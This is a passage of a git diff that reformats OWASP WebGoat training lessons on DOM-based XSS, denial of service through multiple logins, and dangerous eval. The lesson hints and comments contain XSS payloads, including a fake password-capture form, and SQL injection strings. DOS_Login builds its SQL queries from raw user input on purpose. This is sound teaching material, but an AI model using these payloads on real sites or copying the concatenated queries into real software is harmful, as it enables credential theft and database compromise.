 import org.apache.ecs.html.Script;
 import org.owasp.webgoat.session.*;
 
-public class DOMXSS extends SequentialLessonAdapter {
 
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+public class DOMXSS extends SequentialLessonAdapter
+{
 
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
 	private final static String PERSON = "person";
 
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element createContent(WebSession s) {
+	protected Element createContent(WebSession s)
+	{
 		return super.createStagedContent(s);
 	}
 
-	protected Element doStage1(WebSession s) throws Exception {
+	protected Element doStage1(WebSession s) throws Exception
+	{
 		ElementContainer ec = new ElementContainer();
 
 		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
 
 		ec.addElement(mainContent(s));
 
-		if (attackString.toString().toLowerCase().indexOf("img") != -1&& attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1) {
+		if (attackString.toString().toLowerCase().indexOf("img") != -1
+				&& attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1)
+		{
 			getLessonTracker(s).setStage(2);
 			s.setMessage("Stage 1 completed. ");
 		}
@@ -50,14 +59,18 @@ public class DOMXSS extends SequentialLessonAdapter {
 		return (ec);
 	}
 
-	protected Element doStage2(WebSession s) throws Exception {
+	protected Element doStage2(WebSession s) throws Exception
+	{
 		ElementContainer ec = new ElementContainer();
 
 		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
 
 		ec.addElement(mainContent(s));
 
-		if (attackString.toString().toLowerCase().indexOf("img") != -1 && attackString.toString().toLowerCase().indexOf("onerror") != -1 && attackString.toString().toLowerCase().indexOf("alert") != -1) {
+		if (attackString.toString().toLowerCase().indexOf("img") != -1
+				&& attackString.toString().toLowerCase().indexOf("onerror") != -1
+				&& attackString.toString().toLowerCase().indexOf("alert") != -1)
+		{
 			getLessonTracker(s).setStage(3);
 			s.setMessage("Stage 2 completed. ");
 		}
@@ -65,28 +78,34 @@ public class DOMXSS extends SequentialLessonAdapter {
 		return (ec);
 	}
 
-	protected Element doStage3(WebSession s) throws Exception {
+	protected Element doStage3(WebSession s) throws Exception
+	{
 		ElementContainer ec = new ElementContainer();
 
 		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
 
 		ec.addElement(mainContent(s));
 
-		if (attackString.toString().toLowerCase().indexOf("iframe") != -1 && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) {
+		if (attackString.toString().toLowerCase().indexOf("iframe") != -1
+				&& attackString.toString().toLowerCase().indexOf("javascript:alert") != -1)
+		{
 			getLessonTracker(s).setStage(4);
 			s.setMessage("Stage 3 completed.");
 		}
 		return (ec);
 	}
 
-	protected Element doStage4(WebSession s) throws Exception {
+	protected Element doStage4(WebSession s) throws Exception
+	{
 		ElementContainer ec = new ElementContainer();
 
 		StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
 
 		ec.addElement(mainContent(s));
 
-		if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1&& attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) {
+		if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1
+				&& attackString.toString().toLowerCase().indexOf("javascript:alert") != -1)
+		{
 			getLessonTracker(s).setStage(5);
 			s.setMessage("Stage 4 completed.");
 		}
@@ -94,20 +113,21 @@ public class DOMXSS extends SequentialLessonAdapter {
 		return (ec);
 	}
 
-	protected Element doStage5(WebSession s) throws Exception {
+	protected Element doStage5(WebSession s) throws Exception
+	{
 		ElementContainer ec = new ElementContainer();
 
 		ec.addElement(mainContent(s));
 
 		/**
 		 * They pass iff:
-		 *
+		 * 
 		 * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)"
 		 */
 		String file = s.getWebResource("javascript/DOMXSS.js");
 		String content = getFileContent(file);
 
-		if(content.indexOf("escapeHTML(name)") != -1)
+		if (content.indexOf("escapeHTML(name)") != -1)
 		{
 			makeSuccess(s);
 		}
@@ -115,11 +135,13 @@ public class DOMXSS extends SequentialLessonAdapter {
 		return ec;
 	}
 
-	protected ElementContainer mainContent(WebSession s) {
+	protected ElementContainer mainContent(WebSession s)
+	{
 		StringBuffer attackString = null;
 
 		ElementContainer ec = new ElementContainer();
-		try {
+		try
+		{
 
 			ec.addElement(new Script().setSrc("javascript/DOMXSS.js"));
 
@@ -139,7 +161,8 @@ public class DOMXSS extends SequentialLessonAdapter {
 
 			Element b = ECSFactory.makeButton("Submit Solution");
 			ec.addElement(b);
-		} catch (Exception e) {
+		} catch (Exception e)
+		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
 		}
@@ -148,11 +171,12 @@ public class DOMXSS extends SequentialLessonAdapter {
 	}
 
 	/**
-	 *  Gets the hints attribute of the HelloScreen object
-	 *
-	 * @return    The hints value
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
 	 */
-	public List<String> getHints(WebSession s) {
+	public List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
 
 		hints.add("Try entering the following: " + "&lt;IMG SRC=\"images/logos/owasp.jpg\"/&gt;");
@@ -161,106 +185,119 @@ public class DOMXSS extends SequentialLessonAdapter {
 
 		hints.add("Try entering the following: " + "&lt;IFRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/IFRAME&gt;");
 
-		hints.add("Try entering the following: " + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button " +
-				"onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;");
+		hints
+				.add("Try entering the following: "
+						+ "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button "
+						+ "onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;");
 
+		// Attack Strings:
 
+		// <IMG SRC="images/logos/owasp.jpg"/>
 
-		//Attack Strings:
+		// <img src=x onerror=;;alert('XSS') />
 
-		//<IMG SRC="images/logos/owasp.jpg"/>
-
-		//<img src=x onerror=;;alert('XSS') />
-
-		//<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-
-		//Please enter your password:<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
+		// <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
+		// Please enter your password:<BR><input type = "password" name="pass"/><button
+		// onClick="javascript:alert('I
+		// have your password: ' +
+		// pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
 
 		return hints;
 	}
 
 	/**
-	 *  Gets the ranking attribute of the HelloScreen object
-	 *
-	 * @return    The ranking value
+	 * Gets the ranking attribute of the HelloScreen object
+	 * 
+	 * @return The ranking value
 	 */
 	private final static Integer DEFAULT_RANKING = new Integer(10);
 
-	protected Integer getDefaultRanking() {
+	protected Integer getDefaultRanking()
+	{
 		return DEFAULT_RANKING;
 	}
 
-	protected Category getDefaultCategory() {
+	protected Category getDefaultCategory()
+	{
 		return Category.AJAX_SECURITY;
 	}
 
 	/**
-	 *  Gets the title attribute of the HelloScreen object
-	 *
-	 * @return    The title value
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
 	 */
-	public String getTitle() {
+	public String getTitle()
+	{
 		return ("LAB: DOM-Based cross-site scripting");
 	}
 
-	public String getInstructions(WebSession s) {
+	public String getInstructions(WebSession s)
+	{
 		String instructions = "";
 
-		if (getLessonTracker(s).getStage() == 1) {
+		if (getLessonTracker(s).getStage() == 1)
+		{
 			instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: <a href = '/WebGoat/images/logos/owasp.jpg'>OWASP IMAGE</a>";
-		} else if (getLessonTracker(s).getStage() == 2) {
+		}
+		else if (getLessonTracker(s).getStage() == 2)
+		{
 			instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag";
-		} else if (getLessonTracker(s).getStage() == 3) {
+		}
+		else if (getLessonTracker(s).getStage() == 3)
+		{
 			instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag.";
-		} else if (getLessonTracker(s).getStage() == 4) {
-			instructions = "STAGE 4:\tUse the following to create a fake login form:<br><br>" + "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button " +
-			"onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;";
-		} else if(getLessonTracker(s).getStage() == 5) {
+		}
+		else if (getLessonTracker(s).getStage() == 4)
+		{
+			instructions = "STAGE 4:\tUse the following to create a fake login form:<br><br>"
+					+ "Please enter your password:&lt;BR&gt;&lt;input type = \"password\" name=\"pass\"/&gt;&lt;button "
+					+ "onClick=\"javascript:alert('I have your password: ' + pass.value);\"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;";
+		}
+		else if (getLessonTracker(s).getStage() == 5)
+		{
 			instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in WebContent/javascript/escape.js.";
 		}
 		return (instructions);
 	}
 
-    private String getFileContent(String content)
-    {
-    	BufferedReader is = null;
-    	StringBuffer sb = new StringBuffer();
+	private String getFileContent(String content)
+	{
+		BufferedReader is = null;
+		StringBuffer sb = new StringBuffer();
 
-    	try
-    	{
-    		is = new BufferedReader(new FileReader(new File(content)));
-    		String s = null;
+		try
+		{
+			is = new BufferedReader(new FileReader(new File(content)));
+			String s = null;
 
-    		while((s = is.readLine()) != null)
-    		{
-    			sb.append(s);
-    		}
-    	}
-    	catch (Exception e)
-    	{
-    		e.printStackTrace();
-    	}
-    	finally
-    	{
-    		if(is != null)
-    		{
-    			try
-    			{
-    				is.close();
-    			}
-    			catch (IOException ioe)
-    			{
+			while ((s = is.readLine()) != null)
+			{
+				sb.append(s);
+			}
+		} catch (Exception e)
+		{
+			e.printStackTrace();
+		} finally
+		{
+			if (is != null)
+			{
+				try
+				{
+					is.close();
+				} catch (IOException ioe)
+				{
 
-    			}
-    		}
-    	}
+				}
+			}
+		}
 
-    	return sb.toString();
-    }
+		return sb.toString();
+	}
 
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
index 678b6ab1f..74f963276 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
@@ -7,7 +8,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,111 +18,108 @@ import org.apache.ecs.html.P;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @created October 28, 2003
  */
 public class DOS_Login extends LessonAdapter
 {
 
-    /**
-     *  Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PASSWORD = "Password";
 
-    /**
-     *  Description of the Field
-     */
-    protected final static String USERNAME = "Username";
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
-	
+
 		try
 		{
-		    String username = "";
-		    String password = "";
-		    username = s.getParser().getRawParameter(USERNAME);
-		    password = s.getParser().getRawParameter(PASSWORD);
-	
-		    // don;t allow user name from other lessons.  it would be too simple.
-		    if (username.equals("jeff") || username.equals("dave"))
-		    {
+			String username = "";
+			String password = "";
+			username = s.getParser().getRawParameter(USERNAME);
+			password = s.getParser().getRawParameter(PASSWORD);
+
+			// don;t allow user name from other lessons. it would be too simple.
+			if (username.equals("jeff") || username.equals("dave"))
+			{
 				ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson"));
 				return (ec.addElement(makeLogin(s)));
-		    }
-	
-		    // Check if the login is valid
-	    	Connection connection = DatabaseUtilities.getConnection(s);
-	
-		    String query = "SELECT * FROM user_system_data WHERE user_name = '"
-			    + username + "' and password = '" + password + "'";
-		    ec.addElement(new StringElement(query));
-		    
-		    try
-		    {
-				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);
+			}
+
+			// Check if the login is valid
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			String query = "SELECT * FROM user_system_data WHERE user_name = '" + username + "' and password = '"
+					+ password + "'";
+			ec.addElement(new StringElement(query));
+
+			try
+			{
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
 				ResultSet results = statement.executeQuery(query);
-				
+
 				if ((results != null) && (results.first() == true))
 				{
-				    ResultSetMetaData resultsMetaData = results.getMetaData();
-				    ec.addElement(DatabaseUtilities.writeTable(results,resultsMetaData));
-				    results.last();
-		
-				    // If they get back more than one user they succeeded
-				    if (results.getRow() >= 1)
-				    {
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+
+					// If they get back more than one user they succeeded
+					if (results.getRow() >= 1)
+					{
 						// Make sure this isn't data from an sql injected query.
 						if (results.getString(2).equals(username) && results.getString(3).equals(password))
 						{
-						    String insertData1 = "INSERT INTO user_login VALUES ( '"
-							    + username
-							    + "', '"
-							    + s.getUserName()
-							    + "' )";
-						    statement.executeUpdate(insertData1);
+							String insertData1 = "INSERT INTO user_login VALUES ( '" + username + "', '"
+									+ s.getUserName() + "' )";
+							statement.executeUpdate(insertData1);
 						}
 						// check the total count of logins
 						query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
@@ -131,134 +128,125 @@ public class DOS_Login extends LessonAdapter
 						// If they get back more than one user they succeeded
 						if (results.getRow() >= 3)
 						{
-						    makeSuccess(s);
-						    String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName() + "'";
-						    statement.executeUpdate(deleteData1);
-						    return (new H1("Congratulations! Lesson Completed"));
+							makeSuccess(s);
+							String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName()
+									+ "'";
+							statement.executeUpdate(deleteData1);
+							return (new H1("Congratulations! Lesson Completed"));
 						}
-			
+
 						ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow()));
-				    }
+					}
 				}
 				else
 				{
-				    ec.addElement(new H2("Login Failed"));
-				    // check the total count of logins
-				    query = "SELECT * FROM user_login WHERE webgoat_user = '"
-					    + s.getUserName() + "'";
-				    results = statement.executeQuery(query);
-				    results.last();
-				    ec.addElement(new H2("Successfull login count: "
-					    + results.getRow()));
-		
+					ec.addElement(new H2("Login Failed"));
+					// check the total count of logins
+					query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
+					results = statement.executeQuery(query);
+					results.last();
+					ec.addElement(new H2("Successfull login count: " + results.getRow()));
+
 				}
-		    }
-		    catch (SQLException sqle)
-		    {
+			} catch (SQLException sqle)
+			{
 				ec.addElement(new P().addElement(sqle.getMessage()));
 				sqle.printStackTrace();
-		    }
-		}
-		catch (ParameterNotFoundException pnfe)
+			}
+		} catch (ParameterNotFoundException pnfe)
 		{
 			/**
-			 * Catching this exception prevents the "Error generating org.owasp.webgoat.lesson.DOS_Login"
-			 * message from being displayed on first load. Note that if we are missing a parameter in
-			 * the request, we do not want to continue processing and we simply want to display the
-			 * default login page.
+			 * Catching this exception prevents the "Error generating
+			 * org.owasp.webgoat.lesson.DOS_Login" message from being displayed on first load. Note
+			 * that if we are missing a parameter in the request, we do not want to continue
+			 * processing and we simply want to display the default login page.
 			 */
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			s.setMessage("Error generating " + this.getClass().getName());
 		}
-	
+
 		return (ec.addElement(makeLogin(s)));
-    }
-
-
-    /**
-     *  Gets the category attribute of the WeakAuthenticationCookie object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.DOS;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the CookieScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Use a SQL Injection to obtain the user names. ");
-	hints
-		.add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
-	hints
-		.add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(90);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the CookieScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Denial of Service from Multiple Logins");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeLogin(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	// add the login fields
-	Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
-	if (s.isColor())
-	{
-	    t.setBorder(1);
 	}
 
-	TR row1 = new TR();
-	TR row2 = new TR();
-	row1.addElement(new TD(new StringElement("User Name: ")));
-	row2.addElement(new TD(new StringElement("Password: ")));
+	/**
+	 * Gets the category attribute of the WeakAuthenticationCookie object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.DOS;
+	}
 
-	Input input1 = new Input(Input.TEXT, USERNAME, "");
-	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-	row1.addElement(new TD(input1));
-	row2.addElement(new TD(input2));
-	t.addElement(row1);
-	t.addElement(row2);
+	/**
+	 * Gets the hints attribute of the CookieScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Use a SQL Injection to obtain the user names. ");
+		hints
+				.add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
+		hints.add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
+		return hints;
+	}
 
-	Element b = ECSFactory.makeButton("Login");
-	t.addElement(new TR(new TD(b)));
-	ec.addElement(t);
+	private final static Integer DEFAULT_RANKING = new Integer(90);
 
-	return (ec);
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the CookieScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Denial of Service from Multiple Logins");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeLogin(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		// add the login fields
+		Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new StringElement("User Name: ")));
+		row2.addElement(new TD(new StringElement("Password: ")));
+
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+		row1.addElement(new TD(input1));
+		row2.addElement(new TD(input2));
+		t.addElement(row1);
+		t.addElement(row2);
+
+		Element b = ECSFactory.makeButton("Login");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+
+		return (ec);
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
index 794171bee..0a7f3cd7b 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -20,261 +20,275 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Eric Sheridan, Aspect Security <a href="http://www.aspectsecurity.com"/>
- * @created    October 28, 2003
+ * 
+ * @author Eric Sheridan, Aspect Security <a href="http://www.aspectsecurity.com"/>
+ * @created October 28, 2003
  */
 
 public class DangerousEval extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-	public final static String PASSED = "__DANGEROUS_EVAL_PASS";
-	
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
-    protected Element createContent(WebSession s)
-    {
+	public final static String PASSED = "__DANGEROUS_EVAL_PASS";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	protected Element createContent(WebSession s)
+	{
 		ElementContainer ec = new ElementContainer();
 		String regex1 = "^[0-9]{3}$";// any three digits
 		Pattern pattern1 = Pattern.compile(regex1);
-	
+
 		try
 		{
 			checkSuccess(s);
-			
+
 			String param1 = s.getParser().getRawParameter("field1", "111");
-		    //String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
-		    float quantity = 1.0f;
-		    float total = 0.0f;
-		    float runningTotal = 0.0f;
-	
-		    // FIXME: encode output of field2, then s.setMessage( field2 );
-		    ec.addElement("<script src=\"javascript/eval.js\"/>");
-		    ec.addElement(new HR().setWidth("90%"));
-		    ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-		    Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
-	
-		    if (s.isColor())
-		    {
-		    	t.setBorder(1);
-		    }
-	
-		    TR tr = new TR();
-		    tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
-		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
-		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-		    tr.addElement(new TH().addElement("Total").setWidth("7%"));
-		    t.addElement(tr);
-	
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-		    tr.addElement(new TD().addElement("69.99").setAlign("right"));
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "1"))).setAlign("right"));
-		    quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
-		    total = quantity * 69.99f;
-		    runningTotal += total;
-		    tr.addElement(new TD().addElement("$" + total));
-		    t.addElement(tr);
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
-		    tr.addElement(new TD().addElement("27.99").setAlign("right"));
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "1"))).setAlign("right"));
-		    quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
-		    total = quantity * 27.99f;
-		    runningTotal += total;
-		    tr.addElement(new TD().addElement("$" + total));
-		    t.addElement(tr);
-		    tr = new TR();
